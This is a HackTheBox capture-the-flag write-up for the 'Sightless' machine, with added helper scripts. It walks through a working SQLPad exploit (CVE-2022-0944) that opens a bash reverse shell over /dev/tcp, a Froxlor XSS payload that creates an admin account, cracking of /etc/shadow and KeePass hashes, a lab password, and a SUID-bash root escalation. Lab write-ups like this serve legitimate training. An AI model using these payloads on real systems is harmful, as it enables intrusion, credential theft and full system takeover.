HackTheBox Sightless Writeup
Explore the fundamentals of cybersecurity with the Sightless Capture The Flag (CTF) challenge, an easy-level experience designed to be accessible and ideal for beginners. This straightforward CTF write-up offers clear insights into essential Linux concepts.
Add Hosts
Edit the /etc/hosts file and add the following entries:
10.10.11.32 sightless.htb sqlpad.sightless.htb
This ensures that your system resolves sightless.htb and sqlpad.sightless.htb to the correct IP address, 10.10.11.32.
Script to add hosts automatically
ip="10.10.11.32"
domain="sightless.htb sqlpad.sightless.htb admin.sightless.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV sightless.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-14 04:47 CEST
Nmap scan report for sightless.htb (10.10.11.32)
Host is up (0.049s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_ 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Sightless.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.95%I=7%D=9/14%Time=66E4F941%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,A0,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20Ser
SF:ver\)\x20\[::ffff:10\.10\.11\.32\]\r\n500\x20Invalid\x20command:\x20try
SF:\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x20b
SF:eing\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
CVE-2022-0944
Time to prepare our listener to catch a reverse shell:
nc -lvnp 9001
The sqlpad service will be targeted using a known vulnerability (CVE-2022-0944). Below is a Python script to automate the exploitation process:
#!/usr/bin/env python3
import os
import requests

root_url = "http://sqlpad.sightless.htb"
# VPN (tun0) address of the attacking box, used as the reverse-shell callback target
attacker_ip = os.popen("ip a | grep -A 2 'tun0:' | grep -oP '(?<=inet\\s)\\d+(\\.\\d+){3}'").read().strip()
attacker_port = "9001"
target_url = f"{root_url}/api/test-connection"
payload = f"{{{{ process.mainModule.require('child_process').exec('/bin/bash -c \"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1\"') }}}}"
headers = {
    'Content-Type': 'application/json',
    'Accept': 'application/json'
}
data = {
    "name": "test",
    "driver": "mysql",
    "data": {
        "database": payload
    },
    "database": payload
}

def main():
    try:
        response = requests.post(target_url, headers=headers, json=data)
        print(f"Response status code: {response.status_code}")
        print(f"Response body: {response.text}")
        if response.status_code == 200:
            print(f"Exploit sent successfully. Check your listener on {attacker_ip}:{attacker_port}")
        else:
            print(f"Exploit sent, but server responded with status code: {response.status_code}. Check your listener.")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    main()
Docker Environment
Run the following command to confirm you are inside a Docker container:
ls / -la
If you find a /docker-entrypoint file, or /proc/1/cgroup references Docker, you are inside a container; proceed to the next step.
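As an added check (not part of the original writeup), this Python snippet gathers the same container indicators in one place and parses /proc/1/cgroup instead of eyeballing it; the temporary directory it builds is a constructed stand-in for a container's filesystem, and the marker list is an assumption of common cgroup path names.

```python
import os
import tempfile

# Substrings that typically appear in a container's cgroup path (assumed common names).
CGROUP_MARKERS = ("/docker/", "docker-", "/lxc/", "containerd", "/kubepods")

def cgroup_indicates_container(cgroup_text):
    """True if any /proc/1/cgroup line (hierarchy:controllers:path) names a container cgroup.
    Caveat: under cgroup v2 a container often shows only '0::/', so False here is not
    proof that you are on the host; the file checks below are then the better signal."""
    for line in cgroup_text.splitlines():
        parts = line.split(":", 2)
        if len(parts) == 3 and any(m in parts[2] for m in CGROUP_MARKERS):
            return True
    return False

def container_indicators(root="/"):
    """Return the container hints this writeup looks for, found under `root`.
    `root` defaults to the live system; pass a directory to run against a test tree."""
    found = []
    for marker in (".dockerenv", "docker-entrypoint", "docker-entrypoint.sh"):
        if os.path.exists(os.path.join(root, marker)):
            found.append("/" + marker)
    cgroup = os.path.join(root, "proc", "1", "cgroup")
    if os.path.isfile(cgroup):
        with open(cgroup) as fh:
            if cgroup_indicates_container(fh.read()):
                found.append("/proc/1/cgroup")
    return found

def constructed_container_tree():
    """Build a throwaway directory that mimics a Docker container's filesystem (constructed sample)."""
    root = tempfile.mkdtemp(prefix="fake-container-")
    os.makedirs(os.path.join(root, "proc", "1"))
    open(os.path.join(root, ".dockerenv"), "w").close()
    with open(os.path.join(root, "proc", "1", "cgroup"), "w") as fh:
        fh.write("12:cpu,cpuacct:/docker/0123456789abcdef\n0::/\n")
    return root

if __name__ == "__main__":
    hits = container_indicators()
    print("container indicators:", hits if hits else "none found")
```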
Get Michael’s Hash
cat /etc/shadow
Extract the hash for the user michael.
Brute Force the Hash
echo -n "Password Hash? --> " ; read -r hash
echo "$hash" > /tmp/hash.txt
hashcat -m 1800 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 1800 /tmp/hash.txt --show
rm -f /tmp/hash.txt
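Added example, not from the original writeup: it shows why mode 1800 is the right one by reading the crypt(3) prefix of michael's shadow entry and mapping it to the hashcat mode, and it also flags prefixes hashcat cannot handle (yescrypt, the $y$ default on recent Ubuntu). The shadow lines are constructed placeholders, not real hashes.

```python
import re

# hashcat mode per crypt(3) algorithm id (values from hashcat's mode list).
# yescrypt ($y$) has no hashcat mode, so it maps to None.
HASHCAT_MODES = {
    "1": 500,    # md5crypt
    "5": 7400,   # sha256crypt
    "6": 1800,   # sha512crypt, the algorithm behind michael's hash in this writeup
    "2a": 3200,  # bcrypt variants
    "2b": 3200,
    "2y": 3200,
}

# Constructed /etc/shadow content: hash values are placeholders, not real hashes.
SAMPLE_SHADOW = """\
root:*:19000:0:99999:7:::
michael:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASHVALUE0000000000000000000000000:19800:0:99999:7:::
www-data:!:19000:0:99999:7:::
"""

def shadow_hash(shadow_text, username):
    """Return the password field of `username` from shadow-format text, or None if absent."""
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0] == username:
            return fields[1]
    return None

def classify_hash(password_field):
    """Return (algorithm id, hashcat mode). Locked or empty accounts give (None, None);
    a recognised prefix without hashcat support gives (id, None)."""
    if not password_field or password_field.startswith(("*", "!")):
        return None, None
    m = re.match(r"^\$([a-z0-9]+)\$", password_field)
    if not m:
        return None, None  # legacy DES or an unknown format
    algo = m.group(1)
    return algo, HASHCAT_MODES.get(algo)

def hashcat_command(password_field, hash_file="/tmp/hash.txt", wordlist="/usr/share/dict/rockyou.txt"):
    """Build the hashcat invocation matching the hash's algorithm, or None if hashcat cannot crack it."""
    _, mode = classify_hash(password_field)
    if mode is None:
        return None
    return f"hashcat -m {mode} -a 0 {hash_file} {wordlist}"
```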
SSH into the Target
Use the cracked password to SSH into michael’s account:
ssh michael@sightless.htb
cat user.txt
Froxlor (Intended): CVE-2024-34070
Port forwarding:
sshpass -p insaneclownposse ssh michael@sightless.htb -L 8081:localhost:8080 -N -f
http://admin.sightless.htb:8081/
admin{{$emit.constructor`function+b(){+var+metaTag%3ddocument.querySelector('meta[name%3d"csrf-token"]')%3b+var+csrfToken%3dmetaTag.getAttribute('content')%3b+var+xhr%3dnew+XMLHttpRequest()%3b+var+url%3d"http%3a//admin.sightless.htb%3a8080/admin_admins.php"%3b+var+params%3d"new_loginname%3dabcd%26admin_password%3dAbcd%40%401234%26admin_password_suggestion%3dmgphdKecOu%26def_language%3den%26api_allowed%3d0%26api_allowed%3d1%26name%3dAbcd%26email%3dtest%40gmail.com%26custom_notes%3d%26custom_notes_show%3d0%26ipaddress%3d-1%26change_serversettings%3d0%26change_serversettings%3d1%26customers%3d0%26customers_ul%3d1%26customers_see_all%3d0%26customers_see_all%3d1%26domains%3d0%26domains_ul%3d1%26caneditphpsettings%3d0%26caneditphpsettings%3d1%26diskspace%3d0%26diskspace_ul%3d1%26traffic%3d0%26traffic_ul%3d1%26subdomains%3d0%26subdomains_ul%3d1%26emails%3d0%26emails_ul%3d1%26email_accounts%3d0%26email_accounts_ul%3d1%26email_forwarders%3d0%26email_forwarders_ul%3d1%26ftps%3d0%26ftps_ul%3d1%26mysqls%3d0%26mysqls_ul%3d1%26csrf_token%3d"%2bcsrfToken%2b"%26page%3dadmins%26action%3dadd%26send%3dsend"%3b+xhr.open("POST",url,true)%3b+xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded")%3b+xhr.send(params)}%3ba%3db()`()+}}
Intercept the Froxlor login with Burp.
Change the loginname parameter.
Log in with abcd:Abcd@@1234.
You will see the web1 FTP account in the link.
Set the password for web1.
Log out and log in as web1.
Now set the FTP password through the link.
Crack the KeePass Database
Connect to the FTP Server:
- Use the following command to connect:
lftp sightless.htb
- Log in with username web1 and the provided password:
login web1 <password>
- Disable certificate verification to avoid errors:
set ssl:verify-certificate no
List and Retrieve Files:
- List the available files:
ls
You will see output similar to:
drwxr-xr-x 3 web1 web1 4096 May 17 03:17 goaccess
-rw-r--r-- 1 web1 web1 8376 Mar 29 10:29 index.html
- Navigate to the goaccess directory and its backup subdirectory:
cd goaccess/backup/
ls
Inside backup, you’ll find the KeePass database file (Database.kdb):
-rw-r--r-- 1 web1 web1 5292 Aug 6 14:29 Database.kdb
- Download the KeePass database:
get Database.kdb
Analyze the KeePass Database:
- Use a tool like kpcli to attempt to open the database:
kpcli --kdb Database.kdb
- You will need the master password to proceed.
Crack the KeePass Password:
- Extract the hash from the KeePass database and save it as Database.kdb.hash:
keepass2john Database.kdb | tee Database.kdb.hash
- Use hashcat with a dictionary file (e.g., rockyou.txt) to crack the hash:
hashcat Database.kdb.hash /usr/share/dict/rockyou.txt --user -m 13400
- If successful, hashcat will display the master password.
Access and Extract Data:
- Open the KeePass database using the cracked password:
kpcli --kdb Database.kdb
- Navigate to the relevant section of the database and save the SSH key attachment:
ls General/sightless.htb/Backup/
show -f General/sightless.htb/Backup/ssh
attach General/sightless.htb/Backup/ssh
Connect to the Target System:
- Use the extracted SSH private key to log in as root:
dos2unix id_rsa
echo "" >> ~/id_rsa
chmod 600 ~/id_rsa
ssh -i ~/id_rsa root@sightless.htb
To check for CRLF line endings, use exiftool for metadata or simply open the file in a text editor, where the line endings (LF/CRLF) are usually displayed in the UI.
Capture the Flag:
- Read the root.txt file to complete the challenge:
cat root.txt
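Added example (not from the original writeup) that does the dos2unix and echo steps programmatically and reports what was wrong with the key file before ssh would accept it; the key bytes below are a constructed placeholder with Windows-style line endings and no final newline, not key material.

```python
import os

def key_line_ending_report(data):
    """Describe the defects this writeup fixes by hand: CRLF endings (dos2unix),
    a missing final newline (echo "" >>), plus a UTF-8 BOM and missing PEM armor."""
    crlf = data.count(b"\r\n")
    return {
        "crlf_lines": crlf,
        "bare_cr": data.count(b"\r") - crlf,
        "ends_with_newline": data.endswith(b"\n"),
        "has_bom": data.startswith(b"\xef\xbb\xbf"),
        "has_pem_armor": b"-----BEGIN " in data and b"-----END " in data,
    }

def normalize_private_key(data):
    """Return the key with LF endings only, no BOM and exactly one trailing newline."""
    if data.startswith(b"\xef\xbb\xbf"):
        data = data[3:]
    data = data.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
    return data.rstrip(b"\n") + b"\n"

def fix_key_file(path):
    """Rewrite `path` in place with normalized line endings and owner-only permissions (0600)."""
    with open(path, "rb") as fh:
        data = fh.read()
    fixed = normalize_private_key(data)
    with open(path, "wb") as fh:
        fh.write(fixed)
    os.chmod(path, 0o600)
    return key_line_ending_report(fixed)

# Constructed sample: the shape of an attachment extracted from KeePass with CRLF
# endings and no final newline. The body lines are placeholders, not a real key.
SAMPLE_KEY_CRLF = (
    b"-----BEGIN OPENSSH PRIVATE KEY-----\r\n"
    b"CONSTRUCTEDBASE64LINE0000000000000000000000000000000000000000000\r\n"
    b"CONSTRUCTEDBASE64LINE1111111111111111111111111111111111111111111\r\n"
    b"-----END OPENSSH PRIVATE KEY-----"
)

if __name__ == "__main__":
    print("before:", key_line_ending_report(SAMPLE_KEY_CRLF))
    print("after: ", key_line_ending_report(normalize_private_key(SAMPLE_KEY_CRLF)))
```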
Froxlor (Unintended): Chrome Debugging
This is possible because the --remote-debugging-port=0 flag is enabled in Chrome, allowing remote debugging.
sshpass -p insaneclownposse ssh michael@sightless.htb
To determine the correct ports, use the following commands to check for active processes and listening ports:
ps auxww | grep chrome
ss -tulpn
Alternatively, you can use tools like pspy to monitor or confirm activity.
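Added example, not from the original writeup, that does the ps/ss correlation above in code over constructed sample output (pids, ports and paths are made up). The same logic serves a defender: a browser process carrying --remote-debugging-port is exactly what to alert on, and the port it actually bound is what to look for in the socket table.

```python
import re

# Constructed sample output of `ps auxww` and `ss -tulpn`; values are made up.
PS_SAMPLE = """\
USER       PID %CPU %MEM    VSZ   RSS TTY  STAT START TIME COMMAND
michael   1234  0.3  2.1 123456 78910 ?    Sl   10:00 0:05 /usr/bin/chrome --headless --remote-debugging-port=0 --user-data-dir=/tmp/chrome-profile
root        42  0.0  0.1   1234   567 ?    Ss   09:59 0:00 /usr/sbin/sshd -D
"""
SS_SAMPLE = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp   LISTEN 0      128    0.0.0.0:22        0.0.0.0:*         users:(("sshd",pid=42,fd=3))
tcp   LISTEN 0      10     127.0.0.1:44163   0.0.0.0:*         users:(("chrome",pid=1234,fd=20))
tcp   LISTEN 0      511    127.0.0.1:8080    0.0.0.0:*         users:(("nginx",pid=99,fd=6))
udp   UNCONN 0      0      127.0.0.53%lo:53  0.0.0.0:*         users:(("systemd-resolve",pid=7,fd=12))
"""

DEBUG_FLAG = re.compile(r"--remote-debugging-(?:port|pipe)(?:=(\d+))?")
LISTEN_LINE = re.compile(r"\bLISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+.*?pid=(\d+)")

def debug_enabled_pids(ps_output):
    """Map pid -> port requested on the command line for each process started with a
    remote-debugging flag. Port 0 (as on this box) means 'pick a free port', so the real
    port can only be learned from the socket table."""
    found = {}
    for line in ps_output.splitlines():
        m = DEBUG_FLAG.search(line)
        cols = line.split()
        if m and len(cols) > 1 and cols[1].isdigit():
            found[int(cols[1])] = int(m.group(1)) if m.group(1) is not None else None
    return found

def listening_sockets(ss_output):
    """Map pid -> [(local address, port), ...] for TCP LISTEN entries in `ss -tulpn` output."""
    sockets = {}
    for line in ss_output.splitlines():
        m = LISTEN_LINE.search(line)
        if m:
            sockets.setdefault(int(m.group(3)), []).append((m.group(1), int(m.group(2))))
    return sockets

def find_debug_ports(ps_output, ss_output):
    """Join both views: pid -> ports a debug-enabled browser is actually listening on.
    That list is what to forward here, and what to alert on as a defender."""
    sockets = listening_sockets(ss_output)
    return {pid: sockets.get(pid, []) for pid in debug_enabled_pids(ps_output)}
```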
Forward ports using SSH to access internal web services from your PC:
sshpass -p insaneclownposse ssh michael@sightless.htb -L 8081:localhost:8080 -N -f
sshpass -p insaneclownposse ssh michael@sightless.htb -L 44163:localhost:44163 -N -f
Note that port 44163 may vary, so check for the correct port using the earlier steps.
Now, on your PC, open Chromium:
chromium
Next, navigate to the Chromium inspect devices page:
- Open Chromium and go to chrome://inspect/#devices.
- Add localhost:44163 to the forwarded targets and click inspect on the remote web service.
- Inspect the website by pressing F12 to open Developer Tools, then go to the Network tab.
- Make sure Preserve log is enabled for easier access to network activity.
You will find a POST request to the Froxlor service whose payload contains the username and password in the network logs.
For more details, refer to this resource: Chrome Remote Debugger Pentesting.
Web Exploitation
- Inspect the website for a POST request to /index.php to capture the username and password.
- Log in and add a PHP version at:
http://admin.sightless.htb:8081/admin_phpsettings.php?page=fpmdaemons&action=add
- In the restart command, put:
chmod 4755 /bin/bash
- Restart the PHP-FPM service to trigger the command:
http://admin.sightless.htb:8081/admin_settings.php?page=overview&part=phpfpm
ssh michael@sightless.htb
/bin/bash -p
cat /tmp/root.txt